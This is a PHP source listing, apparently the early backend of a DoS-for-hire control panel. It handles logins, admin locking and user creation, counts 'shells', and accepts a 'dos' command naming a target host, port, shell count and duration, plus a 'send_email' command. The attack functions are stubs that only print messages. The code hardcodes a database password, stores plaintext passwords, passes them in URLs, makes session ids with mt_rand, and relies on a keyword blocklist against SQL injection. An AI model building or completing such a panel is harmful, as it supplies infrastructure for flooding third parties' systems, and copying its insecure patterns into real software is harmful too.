<?php//configurationclass Config { public static $mysql_user = "ilia"

1. <?php
2.  
3. //configuration
4. class Config {
5.     public static $mysql_user = "ilia";
6.     public static $mysql_pass = "horilka";
7.     public static $mysql_server = "localhost";
8.     public static $mysql_database = "ilia";
9.     public static $mysql_table_prefix = "p_";
10.     public static $debug = true;
11. }
12.  
13. //error response codes
14. class ErrorCode {
15.    
16.     /*
17.     public static $MISSING_PARAMETERS = 1;
18.     public static $AUTHENTICATION_FAILED = 2;
19.     public static $USER_NOT_FOUND = 3;
20.     public static $LOGIN_FAILED = 4;
21.     public static $ACCESS_DENIED = 5;
22.     public static $INVALID_COMMAND = 6;
23.     */
24.    
25.     public static $MISSING_PARAMETERS = "missing params";
26.     public static $AUTHENTICATION_FAILED = "authentication failed";
27.     public static $USER_NOT_FOUND = "user not found";
28.     public static $LOGIN_FAILED = "login failed";
29.     public static $ACCESS_DENIED = "access denied";
30.     public static $INVALID_COMMAND = "invalid command";
31.     public static $MYSQL_ERROR = "mysql error";
32.     public static $MYSQL_ILLEGAL_QUERY = "fuck off";
33.    
34. }
35.  
36. class ServletInterface {
37.     public static function dos($host, $port, $shells, $time) {
38.         echo "dossing now!";
39.     }
40.    
41.     public static function email($to, $from, $email, $subject, $message) {
42.         echo "sending email!";
43.     }
44. }
45.  
46. class Session {
47.    
48.     //stores all the user info
49.     private $user = array();
50.    
51.     //user info is loaded in the constructor
52.     public function __construct() {
53.         //make sure the user parameter is set
54.         Util::isset_m('user');
55.        
56.         $this->user = Mysql::getUserRow($_GET['user']);
57.         //make sure user exists
58.         if($this->user == null) {
59.             Util::error(ErrorCode::$USER_NOT_FOUND);
60.         }
61.     }
62.    
63.     //login function
64.     public function login() {
65.        
66.         //make sure the pass is set
67.         Util::isset_m('pass');
68.        
69.         if($this->user['pass'] == $_GET['pass']) {
70.             //update the database
71.             $this->user['id'] = Util::random_str(20);
72.             $this->user['ip'] = $_SERVER['REMOTE_ADDR'];
73.             $this->user['time'] = time();
74.             Mysql::setSession($this->user['name'], $this->user['id'], $this->user['time'], $this->user['ip']);
75.             //echo out all the info
76.             Util::report_info($this->user);
77.         }else {
78.             Util::error(ErrorCode::$LOGIN_FAILED);
79.         }
80.     }
81.    
82.     //clear the session id
83.     public function logout() {
84.         Mysql::clearSession($this->user['name']);
85.     }
86.    
87.     //output account info
88.     public function getAccountInfo() {
89.         Util::report_info($this->user);
90.     }
91.    
92.     //check if the session id is correct
93.     public function checkId() {
94.         Util::isset_m('session_id');
95.         if($this->user['id'] != $_GET['session_id']) {
96.             Util::error(ErrorCode::$AUTHENTICATION_FAILED);
97.         }
98.     }
99.    
100.     //make sure the user is admin
101.     public function checkAdmin() {
102.         if($this->user['type'] != "admin") {
103.             Util::error(ErrorCode::$ACCESS_DENIED);
104.         }
105.     }
106.    
107.     //lock the account
108.     public function lockAccount() {
109.         Mysql::setStatus($this->user['name'], "locked");
110.     }
111.    
112.     //unlock the account
113.     public function unlockAccount() {
114.         Mysql::setStatus($this->user['name'], "active");
115.     }
116. }
117.  
118. class Mysql {
119.     private static $con = null;
120.     // Connect to the mysql database.
121.     public static function connect() {
122.         self::$con = @mysql_connect(Config::$mysql_server, Config::$mysql_user, Config::$mysql_pass);
123.         if(!self::$con) {
124.             Util::error(ErrorCode::$MYSQL_ERROR);
125.         }
126.         mysql_select_db(Config::$mysql_database, self::$con);
127.     }
128.    
129.     // Disconnect from the mysql database.
130.     public static function disconnect() {
131.         if(self::$con) {
132.             mysql_close(self::$con);
133.         }
134.     }
135.    
136.     //sqli prevention check
137.     private static function sqli_check(/*... */) {
138.        
139.         $sqli_illegal = Array("select", "drop", "insert", "update", "create", "grant", "revoke");
140.         $unsafe_args = func_get_args();
141.        
142.         foreach($unsafe_args as $unsafe) {
143.             if($unsafe != mysql_real_escape_string($unsafe)) {
144.                 Util::error(ErrorCode::$MYSQL_ILLEGAL_QUERY);
145.             }
146.             foreach($sqli_illegal as $x) {
147.                 if(strpos(strtolower($unsafe), $x) !== false) {
148.                     Util::error(ErrorCode::$MYSQL_ILLEGAL_QUERY);
149.                 }
150.             }
151.         }
152.     }
153.    
154.     // Create a user into the mysql user table.
155.     public static function createUser($user, $pass, $account_type, $extra_info) {
156.         self::sqli_check($user, $pass, $account_type, $extra_info);
157.         $time = time();
158.         $query = "INSERT INTO " . Config::$mysql_table_prefix . "clients (user, pass, session_id, session_timeout, session_ip, account_status, active_shells, account_type, extra_info) VALUES ('$user', '$pass', '0', '$time' , '0', 'active', '0', '$account_type', '$extra_info');";
159.         mysql_query($query);
160.     }
161.    
162.     //set the session information
163.     public static function setSession($user, $session_id, $session_time, $session_ip) {
164.         self::sqli_check($user, $session_id, $session_time, $session_ip);
165.         $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET session_id = '$session_id',  session_ip = '$session_ip', session_timeout = '$session_time' WHERE user = '$user'";
166.         mysql_query($query);
167.     }
168.    
169.     //clear the session information
170.     public static function clearSession($user) {
171.         self::sqli_check($user);
172.         $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET session_id = '0', session_timeout = '0' WHERE user = '$user'";
173.         mysql_query($query);
174.     }
175.    
176.    
177.     //get the user's info and return it as an array
178.     public static function getUserRow($user) {
179.         self::sqli_check($user);
180.         $query = "SELECT * FROM " . Config::$mysql_table_prefix . "clients WHERE user = '$user' LIMIT 1;";
181.         $result = mysql_query($query);
182.         if(!$result) {
183.             Util::error(ErrorCode::$MYSQL_ERROR);
184.         }
185.         $user = array();
186.         if(mysql_num_rows($result) == 1) {
187.             $resultArray = mysql_fetch_array($result);
188.             $user['name'] = $resultArray['user'];
189.             $user['ip'] = $resultArray['session_ip'];
190.             $user['id'] = $resultArray['session_id'];
191.             $user['time'] = $resultArray['session_timeout'];
192.             $user['status'] = $resultArray['account_status'];
193.             $user['shells'] = $resultArray['active_shells'];
194.             $user['type'] = $resultArray['account_type'];
195.             $user['pass'] = $resultArray['pass'];
196.             $user['info'] = $resultArray['extra_info'];
197.         }else {
198.             $user = null;
199.         }
200.         return $user;
201.     }
202.    
203.     //return the number of shells
204.     public static function getShellCount() {
205.         $query = "SELECT COUNT(*) FROM " . Config::$mysql_table_prefix . "shells";
206.         $result = mysql_query($query);
207.         if(!$result) {
208.             Util::error(ErrorCode::$MYSQL_ERROR);
209.         }
210.         $rows =  mysql_fetch_row($result);
211.         return $rows[0];
212.     }
213.    
214.     //set the user account status
215.     public static function setStatus($u, $status) {
216.         $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET account_status = '$status' WHERE user = '$u' LIMIT 1;";
217.         mysql_query($query);
218.     }
219. }
220.  
221. class Util {
222.    
223.     //make the xml html friendly
224.     public static function formatXML($xml) {
225.         $xml = str_replace("<", "<", $xml);
226.         $xml = str_replace(">", ">", $xml);
227.         $xml = str_replace("\n", "<br />\n", $xml);
228.         return $xml;
229.     }
230.    
231.     //make sure parameters are set
232.     public static function isset_m(/*...*/) {
233.         $params = func_get_args();
234.         foreach($params as $param) {
235.             if(!isset($_GET[$param])) {
236.                 self::error(ErrorCode::$MISSING_PARAMETERS);
237.             }
238.         }
239.     }
240.    
241.     //create a random string
242.     public static function random_str($length) {
243.         $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
244.         $len = strlen($characters);
245.         $rand = "";
246.         for ($i = 0; $i < $length; $i++) {
247.             $rand .= $characters[mt_rand(0, $len - 1)];
248.         }
249.         return $rand;
250.     }
251.    
252.     //report error
253.     public static function error($msg) {
254.         if(Config::$debug) {
255.             echo Util::formatXML("<error> $msg </error>");
256.         }else {
257.             echo "<error> $msg </error>";
258.         }
259.        
260.         Mysql::disconnect();
261.         exit(0);
262.     }
263.    
264.     //report success
265.     public static function success($msg) {
266.         if(Config::$debug) {
267.             echo Util::formatXML("<success> $msg </success>");
268.         }else {
269.             echo "<success> $msg </success>";
270.         }
271.         Mysql::disconnect();
272.         exit(0);
273.     }
274.    
275.     //display account info as xml
276.     public static function report_info($user) {
277.         $total_shells = Mysql::getShellCount();
278.         $info = "<account>\n";
279.         $info .= "  <session_id>" . $user['id'] . "</session_id>\n";
280.         $info .= "  <total_shells>" . $total_shells . "</total_shells>\n";
281.         $info .= "  <active_shells>" . $user['shells'] . "</active_shells>\n";
282.         $info .= "  <account_status>" .$user['status'] . "</account_status>\n";
283.         $info .= "  <account_type>" . $user['type'] . "</account_type>\n";
284.         $info .= "</account>";
285.         if(Config::$debug) {
286.             $info = Util::formatXML($info);
287.         }
288.         echo $info;
289.        
290.         Mysql::disconnect();
291.         exit(0);
292.     }
293.    
294.     //display errors
295.     public static function show_errors() {
296.         error_reporting(E_ALL);
297.         ini_set('display_errors', '1');
298.     }
299.    
300.     //hide errors
301.     public static function hide_errors() {
302.         error_reporting(E_COMPILE_ERROR);
303.         ini_set('display_errors', '0');
304.     }
305. }
306.  
307. //display all php errors
308. Util::show_errors();
309.  
310. //connect to mysql
311. Mysql::connect();
312.  
313. //create the user session
314. $session = new Session();
315.  
316. //make sure there is a command
317. Util::isset_m('cmd');
318.  
319. //authenticate
320. if($_GET['cmd'] == "login") {
321.     $session->login();
322. }else {
323.     $session->checkId();
324. }
325.  
326. //parse the commands
327. switch ($_GET['cmd']) {
328.     case "logout":
329.         $session->logout();
330.         Util::success("Logout Successful");
331.         break;
332.     case "dos":
333.         Util::isset_m('host','port','time','shells');
334.         ServletInterface::dos($_GET['host'], $_GET['port'], $_GET['shells'], $_GET['time']);
335.         break;
336.     case "unlock_account":
337.         $session->checkAdmin();
338.         $session->unlockAccount();
339.         Util::success("Account Unlocked");
340.         break;
341.     case "lock_account":
342.         $session->checkAdmin();
343.         $session->lockAccount();
344.         Util::success("Account Locked");
345.         break;
346.     case "create_user":
347.         $session->checkAdmin();
348.         Util::isset_m('n_user','n_pass','n_type','n_info');
349.         Mysql::createUser($_GET['n_user'], $_GET['n_pass'], $_GET['n_type'], $_GET['n_info']);
350.         Util::success("User Created");
351.         break;
352.     case "send_email":
353.         Util::isset_m('to','from','email','subject','message');
354.         ServletInterface::email($_GET['to'], $_GET['from'], $_GET['email'], $_GET['subject'], $_GET['message']);
355.     case "account_info":
356.         $session->getAccountInfo();
357.     default:
358.         Util::error(ErrorCode::$INVALID_COMMAND);
359.         break;
360. }
361.  
362. Mysql::disconnect();
363.  
364. ?>